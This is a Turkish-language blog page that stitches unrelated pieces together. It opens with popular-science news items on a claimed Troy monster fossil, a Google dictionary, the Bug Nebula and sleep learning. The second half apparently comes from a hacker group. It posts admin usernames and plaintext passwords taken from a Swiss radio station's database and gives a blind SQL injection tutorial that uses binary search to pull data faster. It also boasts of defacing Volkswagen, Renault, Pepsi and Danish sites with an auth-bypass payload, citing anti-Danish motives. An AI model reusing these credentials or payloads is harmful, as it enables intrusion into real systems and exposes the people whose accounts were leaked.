Troya Canavarı'nın Fosili Bulundu...


Çanakkale'nin Ezine ilçesine bağlı Kumburun köyü yakınlarında 11 yıl önce deniz kıyısında bulunan fosilin, Troya mitolojisinde yer alan ''Troya Canavarı'' olduğu iddia edildi.

Zorlu bir yolculuğun ardından fosilin bulunduğu bölgeye ulaşan Troya Kazı Heyeti Başkan Yardımcısı Doç. Dr. Rüstem Aslan, yaptığı açıklamada, bu yıl yaz aylarında Troya Antik Kenti ile Bozköy-Hanaytepe ve çevresinde yüzey araştırması başlattıklarını söyledi.

Tübingen Üniversitesi ile birlikte gerçekleştirilen bu çalışmanın Tunç Çağı'nda Troya ve çevresindeki yerleşim sisteminin anlaşılmasına yönelik olduğuna işaret eden Doç. Dr.Aslan, araştırmanın ilerleyen safhalarında oldukça ilginç bir veriyle karşılaştıklarını belirtti.

Ezine'nin Kumburun köyü yakınlarında 11 yıl önce bir fosil bulunduğunu anımsatan Doç. Dr. Aslan, fosile oldukça yakın bir bölgede bulunan Beşik Koyu bölgesinde eski Troya Kazı Başkanı Prof. Dr. Manfred Osman Korfmann'ın, 1982-1987 yılları arasında kazı yaptığını ve burada son Tunç Çağı'na ait bir mezarlık bulduğunu ifade etti.

Bölgede, Troya-1 ile Troya-6 dönemine kadar bir yerleşim yeri olduğunun bilindiğini kaydeden Doç. Dr. Aslan, ''Troya Antik Kenti'nden 4-5 kilometre uzaktayız, ancak Troya'nın etkisi buralara kadar geliyor. Yapılan çalışmalar artık bize Beşik Koyu'nun, Troya'nın limanı olduğunu gösteriyor'' dedi. Doç. Dr. Aslan, Troya'ya yakın bir bölgede fosil buluntusunun anlamının ne olabileceği konusunda kendisine sorular sorduğunu ve soruların bir anlamda sonucuna ulaştığını bildirdi.

Fosilin kaya üzerindeki dişlerinin, milattan önce 6. yüzyılda bulunan ve üzerinde Herakles'in Troya Prensesi Hesione'yi Troya Ketosu'ndan (Canavar) kurtarma sahnesinin anlatıldığı betimlemeye oldukça benzediğine dikkati çeken Doç. Dr. Aslan, ''Özellikle fosil buluntularıyla en az 4 bin 500 yıllık Troya mitolojisinin oluşum evrelerinin yeniden anlatımında, Homeros dönemi ile bu dönemden önce, insanlarının mitolojiyle bütünleştirip, birleştirip yeniden yorumladıklarını artık daha net bir şekilde anlayabiliyoruz'' diye konuştu.

Doç. Dr. Aslan, son 20 yılda Troya Antik Kenti ile ilgili yapılan araştırmaların, özellikle Manfred Osman Korfmann'ın kazıları ve diğer Homeros uzmanlarının çabalarıyla Troya Savaşları'nın anlatıldığı İlyada Destanı'nın hayal ürünü olmadığının ortaya konduğunu, gerçek, öz ve bazı doğa özelliklerinin Troya mitolojisini biçimlendirip, bugüne kadar getirdiğini kaydetti.

ARKEOLOG KÖRPE

Çanakkale Onsekiz Mart Üniversitesi (ÇOMÜ) öğretim görevlisi arkeolog Reyhan Körpe ise yapılan araştırma ve incelemelerin ardından, söz konusu fosilin 15 ile 35 milyon yıllık olduğunun belirlendiğini söyledi.

Bu yıl bölgede Rüstem Aslan ile yeni bir çalışma başlattıklarını bildiren Körpe, özellikle 1998 yılından sonra yurt dışındaki kütüphane çalışmalarında fosille ilgili geniş çaplı araştırma yaptığını ifade etti. Körpe, fosilin bölgede yaklaşık 3 bin yıldan beri görüldüğünü ve insanlar tarafından bilindiğini belirlediğini belirterek ''Birçok antik kaynakta zaten bu fosilden ve bölgede çıkan fosillerden bahsediliyor. Bununla ilgili derinlemesine yaptığımız çalışmalarda, Troya bölgesindeki insanlar tarafından görüldüğü ve Troya mitolojisine girdiği anlaşıldı'' dedi. Çeşitli vazo resimlerinde bu fosilin Troya Ketosu (Canavarı) olarak anladırıldığını savunan Körpe, şu bilgileri verdi:

''Antik kaynaklardan birisi, bu bölgeden bahsederken burasının antik adı olan Agammia'yı veriyor. Agammia'da, Troya mitolojisinde geçen Herakles'in Troyalı Prenses Hesione'yi kurtarması olayının burada geçtiğini söylüyor. Bu, mitolojide antik vazoda enteresan bir şekilde resmedilmiş. Bahsedilen bu canavar, kayadan çıkan bir fosil kemiği gibi gösterilmiş. Bu da antik kaynakların bahsettiği Troya mitolojisine giren, Troya Ketosu'nun bizim bu fosil kemikleri olduğunu gösterdi. Herakles'in Troyalı Prenses Hesione'yi kurtarmasının resmedildiği antik vazodaki canavar, bu fosildir.''

Körpe, fosilin ve bölgenin Çanakkale'nin en önemli kültür ve tabiat varlıklarından birisi olduğunu, bu nedenle çok kısa sürede koruma altına alınması gerektiğini söyledi.

Google'den Yeni Bir Hizmet


Google'dan online sözlük.

İnternet devi Google, 28 dilde tercüme yapabilen bir online sözlük hizmetini hiçbir açıklama yapmadan sessiz sedasız başlattı.


"google.com/dictionary" internet adresinden dün başlayan tercüme hizmeti sade bir sayfadan kullanıcılara istenilen dilden diğer dile çeviri yapabiliyor.

Henüz Türkçe hizmet vermeyen online sözlük, İngilizce'den diğer dillere veya diğer dillerden İngilizce'ye başarılı bir şekilde tercüme yapıyor.

İlk Kez Görüntülendi...

Samanyolu galaksisinin en sıcak yıldızlarından biri ilk kez görüntülendi.

Bug Nebula'nın merkezindeki yıldız, Güneş'ten 35 kat daha sıcak. Yüzey sıcaklığı 200 bin derece.

Dünya genelinde sayısız gözlem girişiminin ardından, Manchester Üniversitesi'nden astronomlar Hubble Uzay Teleskopunu kullanarak, bu yıldızı ilk kez görüntülemeyi başardı.


Profesör Albert Zijlstra, "Bu yıldızı bulmak çok zordu, çünkü nebulanın ortasında toz bulutunun ardında gizliydi. Bug gibi gezegenimsi bulutsu nebulalar, bir yıldızın ölmesi halinde uzaya büyük miktarlarda gaz püskürtmesiyle oluşuyor ve gece gökyüzündeki en güzel cisimlerden biri böylece ortaya çıkıyor" diye konuştu.

Bug Nebula, Scorpius takımyıldızından yaklaşık 3 bin 500 ışık yılı uzaklıkta.

VeTeknoloji com

"Uykuda öğrenmek" hayal değil gerçek


Uykuda öğrenmek özellikle öğrenciler için "hayal" olsa da bilim adamları, bunun bir anlamda gerçek olduğu görüşünü savunuyor.

Birçok araştırma, uykunun ezber sürecinde önemli rol oynadığını kanıtlarken ABD'nin Northwestern Üniversitesi'nden Ken Paller ve ekibinin yaptığı, Science dergisinde yayımlanan araştırma da öğlen/akşamüstü uykusunda işitme duyusunun uyarılmasının hafızayı güçlendirdiğini gösterdi.

Bilim adamları, 12 gençten bilgisayar ekranındaki 50 şeklin yerini ezberlemesini istedi. Her şekil kendine özgü bir sese sahipti (örneğin kedi şekli-kedi sesi).

Daha sonra uyuyan gönüllülere, derin uyku sırasında 25 şekle özgü ses dinletildi. Uyandıklarında sesleri duyduklarının bilincinde olmayan katılımcılar, "sesini duydukları 25 şekli", "sessiz 25 şekle" göre daha iyi yerleştirdi.

Katılımcılar uyutulmadan yapılan aynı deney başarılı olmadı.

Fransız Le Figaro gazetesinin internet sitesinde de yayımlanan makalede, 2007'de Almanya'nın Lübeck Üniversitesi'nden Jan Born'un koku duyusunu uyararak yaptığı araştırmaya da yer verildi.

Bu araştırma da Paller'inkiyle benzer sonuç vermişti. Önce "gül kokusu eşliğinde" ezber alıştırması yapan katılımcılardan uyumaları istenmiş, derin uyku sırasında aynı koku koklatılmıştı. Bu kişiler testlerde çok başarılı olmuştu.

Fransa Ulusal Bilimsel Araştırma Merkezi'nden Paul Salin, birbirini tamamlayan bu iki araştırmanın derin uyku sırasında koku ve işitme duyularının uyarılmasının ezber yeteneğini artırdığını kanıtladığını belirtti.

Ancak Salin, bugüne kadar kimsenin uyurken CD'den yabancı dil öğrenemediğini belirterek, "hafızanın büyük bir bölümünün görsel ve uykudayken görme sisteminin kapalı olması nedeniyle olayın bu kadar abartılmaması gerektiğine dikkati çekti.

Paris'teki uyku merkezinden Prof. Damien Leger ise "uyurken, ses, ışık ve ısıya duyarlı olmaya devam edildiğini ancak bazı seslerin ezber sürecine katkıda bulunabilmesinin yeni ve ilginç olduğunu" ifade etti.

Belçika'daki Liege Üniversitesi'nden Pierre Maquet'nin yaptığı deneyler ise "iyi hafıza için iyi bir gece geçirmek gerektiği" görüşünü kanıtlamıştı. Maquet'nin yaptığı araştırmalar iyi uykuyu izleyen günde öğrenmenin ve ezberlemenin daha etkili olduğunu göstermişti. Maquet'e göre, uyumak zaman kaybı değil aksine uyku, beynin iyi çalışmasına yardımcı oluyor, ayrıca hormonlar ve bağışıklık sistemi için de faydalı.


VeTeknoloji com

Radio Pilatus MySql İnj~

http://mobile.radiopilatus.ch/

dB > taBlo >> kolon >>> veri

pilatus > admin_users >>
id/username/passwort >>>

Username - Passwort
######## #######
voneschs - kilian
macek - alinghi1373
pilatus - 12pilatus12

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

FtpUsers >> FtpPass
################
Veriler guncellenecek...

Blind Sql İnjection

Bir çoğumuz SQL cümlecikleri kullanarak veritabanlarımızda listeleme, güncelleme ve ekleme işlemleri yaparız. Fakat bu kullandığımız SQL cümleciklerinin ne tür sıkıntılar doğurabileceğinin üzerinde pek durmayız. Bir yazılımcı için önemli olan tüm kullanıcı listesini çekmek ise “SELECT * FROM users” yazmaktır. Belli bir numaraya sahip bir kullanıcı çekmek için ise “SELECT * FROM users WHERE UserID=101” yazmak yetecektir. Fakat kullandığımız programlama teknikleri bir kullanıcının bilgilerini çekmek için yazılan SQL cümleciğini çok tehlikeli durumlara sokabilir. Bu aslında bazen kullanılan dilin, bazen de yazılımcının tekniğinin sonucudur. Yine de ucu açık bir tartışma konusu diyebiliriz.

SQL Injection için söylenecekler çok fazla olsa da temel de problemin ortaya çıkış nedeni; cümleciğin herhangi bir yerine eklenen kod parçacıklarıyla farkedilir. Örneğin; “ ` ” gönderip, sonucunun hata dönmesi gibi. Tabi bazen bu hata çıktılarıda işimizi görmeyebilir veya hata dönmeyebilir. Blind hem SQL Injection açığını barındırmasıyla birlikte sonucun her zaman true/false dönmesiyle ilgilenir. Aslında bu açıklığın ciddi bir problem oluşturması temel bir matematik probleminin varlığıyla meydana gelmektedir.

Blind SQL Injection için örnek;

Sorgu1: SELECT Username FROM users WHERE userid=1
Cevap : bunyamin

Sorgu2: SELECT Username FROM users WHERE userid=121
Cevap :

Görüldüğü gibi database de userid=1 de bir kullanıcı var, userid=121 de ise kullanıcı yok. Burda yapılan bir tane “true” değeri yakalayabilmek. Sorgu1 ile bu sağlanmış oldu. Bundan sonra yapılması gereken, görülen cevaba bakılarak sorgu üzerinde oynamalar yapmak. Her değişikliğimizde geri dönen cevap, yaptıklarımızla doğru yolda olup olmadığımızı söyleyecektir. Sorgu1`i biraz değiştirecek olursak;

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=97
Cevap :

Userid=1 için kullanıcının soyisminin ilk harfi “a” mıdır? Görüldüğü gibi bizim daha önce elde ettiğimiz içerik gelmedi. Biz her sorgumuz da bu içeriğin aynısının gelip gelmediğine bakıyoruz (Yukarıda cevabın true/false dönmesi ile farkedilir dediğimiz kısım).

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=98
Cevap :

Userid=1 için kullanıcının soyisminin ilk harfi “b” midir?

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=68
Cevap : bunyamin

Userid=1 için kullanıcının soyisminin ilk harfi “D” olarak karşımıza çıktı. Çünkü lastname`ni ilk karakterinin ASCII değeri 68. Bu da “D” harfine denk gelmektedir. Bu sorgumuzla birlikte daha önce görmüş olduğumuz içeriği (true) elde ederek farkettik.

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,2,1))=69
Cevap :

Userid=1 için kullanıcının soyisminin ikinci harfi “E” midir?

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,2,1))=101
Cevap : bunyamin

Userid=1 kullanıcısının soyisminin ikinci harfi “e” dir.

Buraya kadar Blind SQL Injection açığının ne olduğunu temel olarak görmüş olduk. Fakat tablo isimleri, tabloların alan adları, içindeki verileri böyle teker teker deneyerek bulmak nekadar zamanımızı alır? Muhtemelen a-z,A-Z ve 0-9 arasına bir de “?,-,+,* v.s” gibi karakterlerin de varlığını hesaba katarsak. Substring ile elde ettiğimiz tek karakteri deneyerek bulmak, bulanık bir zaman dilime gelecekti ki bu da elle imkansıza yakın. Tabi çok büyük verilerin bu şekilde alınmasından bahsediyoruz.

Şimdi ise bu problemi gerçekten kritik bir problem haline getiren matematiksel alt yapıyı ele alalım.

Algoritma Analizi ve Karmaşıklık

Aslında bir algoritmayı neden analiz etmek isteriz? Performansı ölçmek için, farklı algoritmalarla karşılaştırabilmek için, daha iyisi mümkün mü? Bir algoritmanın özelliklerini analiz ederken de çalışma zamanı ve hafıza da kapladığı alana bakarız. Tabi bu maddeleri çoğaltmak mümkün. Fakat genel kabul bir algoritmanın karmaşıklığı; çalışma hızı ve hafıza da kapladığı alanla belirlenir. Biz şu an “zaman” problemi üzerinde duracağız. Çünkü Blind SQL Injection da gördüğümüz gibi teker teker deneme yoluyla bilgi toplamak gerçekten çok zor. Ancak bu deneme zaman aralığını (deneme sayısını) kısaltırsak bu problemi kullanışlı hale getirebiliriz. Zaman karmaşıklığı Büyük-O notasyonu ile gösterilir.

Vİkili Arama (Binary Search)

Problem çözümlerinde böl ve yönet prensibine dayanır. Çözüm süresini genelde ½ oranında bölerek zaman aralığını kısaltmayı hedefler. Bu algoritma da dikkat edilmesi gereken bir husus ise elemanların artan veya azalan şekilde sıralı olmasıdır. Arama işlemi ilk bölünmede sonuçlanmıyorsa tekrar alt kümeler de bölünerek arama işlemi devam eder. İkili arama algoritması için zaman karmaşıklığı O(logN)`dir.

Örnek verecek olursak;

77620076

Sayı olduğunu bildiğimiz bir alan da “2” sayısına ulaşabilmek için 0,1,2,3,4,5,6,7,8,9 u sırayla denesek 3. deneme de bulacaktık. Fakat bu tamamen şansımızla alakalıydı. Eğer aynı durum da “7” için bir arama yapıyor olsaydık bu sefer 8. Deneme de bu sayıyı bulacaktık. Fakat ikili arama lagoritması ile önce 5`den büyük veya küçük olduğuna bakılır. Küçükse soldan, büyükse sağdan devam edilir. Eşit ise durulur.

7 için;

7=5 (false)
7>5 (true)
7=7 (true)

3. denemede eşitliği yakaladık.

ASCII karakterler yardımıyla denemelerimizi yapmıştık. ASCII okunabilir karakterler 36-126 arasındadır.

• f(n) = ?(log n)
• f(126-32) = ?(log (126-32))?
• ~7 karşılaştırmada karakterin doğruluğuna erişilir.

Yani bu aradaki tüm karakterler için en fazla 7 deneme yapmamız yeterlidir. Oysa 126-32=94 defa deneme yapmaktan kurtulmuş oluyoruz. Tabi bu her bir karakter için 94 defa bakılacak anlamına gelmez. Şansınız iyiyse bu sayı daha da küçülebilir. Fakat aynı durum ~7 için de geçerlidir.

Bu sayede bir karakter için harcamamız gereken maksimum deneme 7 olarak belirlemiş olduk. Peki deneme yapacağımız karakter sayısı çok fazla ise? Bu sefer deneme yapılan kümeyi biraz daha azaltabiliriz. Yukarıda örnekler de görüldüğü gibi “E” ve “e” harfleri bir birinden farklı olarak algılanmıştı. Eğer A-Z arasındaki büyük harfleri atar ve kontrol etmek istediğimiz karakteri lowercase`den geçirirsek?

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=68
Cevap : bunyamin

Bu sefer “D” harfi yerine “d” yi kontrol ederek

Sorgu1: SELECT Username FROM users WHERE userid=1 AND ASCII(LOWER(SUBSTRING(Lastname,1,1)))=100
Cevap : bunyamin

Aynı sonuca erişebiliriz. Bu sayede deneme yapacağımız kümeyi ~6 indirebiliriz.

Bu sayede en fazla 94 deneme yerine en fazla 6 deneme de istediimiz bilgiye erişme olanağı ortaya çıkmış oldu.

Özetle; binary search algoritmasının varlığı Blind Sql Injection`u daha tehlikeli hala sokuyor. Eğer bu şekilde bir algoritma olmasaydı bu açıklığın kullanılabilir olması pek mümkün olmayacaktı.

Kaynaklar

1) http://www.owasp.org/index.php/Blind_SQL_Injection
2) http://sqlmap.sourceforge.net/
3) http://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

VolksWagen Camiones y Buses Sql İnj Hck~















VolksWagen şirketinin Arjantin'de üretim yapan kamyon-otobus fabrikasına ait sistem tarafımızca tahrip edilmiştir.

Bu tip zirve sitelere imzalarımızı bırakmaya devam edeceğiz.

Kayıtlar;
http://zone-h.org/mirror/id/9947647
http://zone-h.org/mirror/id/9947646

Mega eCity Danimarka ~ Sql İnj Hack.
















http://zone-h.org/mirror/id/9931947
http://zone-h.org/mirror/id/9931942


Unlü otomtv. sn. "mega ecity" Danimarka'ya ait 2 sitesi hacklendi.

Amacımız her zaman oldugu gibi protestodur. İslamakrşıtı Danimarka'ya saldırılarımız devam edecektir...

Sisteme bypass ile sızılmıştır.

' or ' '='

RenAult Hacked !



http://zone-h.org/mirror/id/9942871

Sql İ.
Sql R.

Pepsi Hacked !





http://zone-h.org/mirror/id/9941448

Şili'ye hizmet veren sitesi sql inj. ile tahrip edilmiştir.

Kurban Bayramınız Kutlu Olsun...



Ve Amerika'daki Turkler =)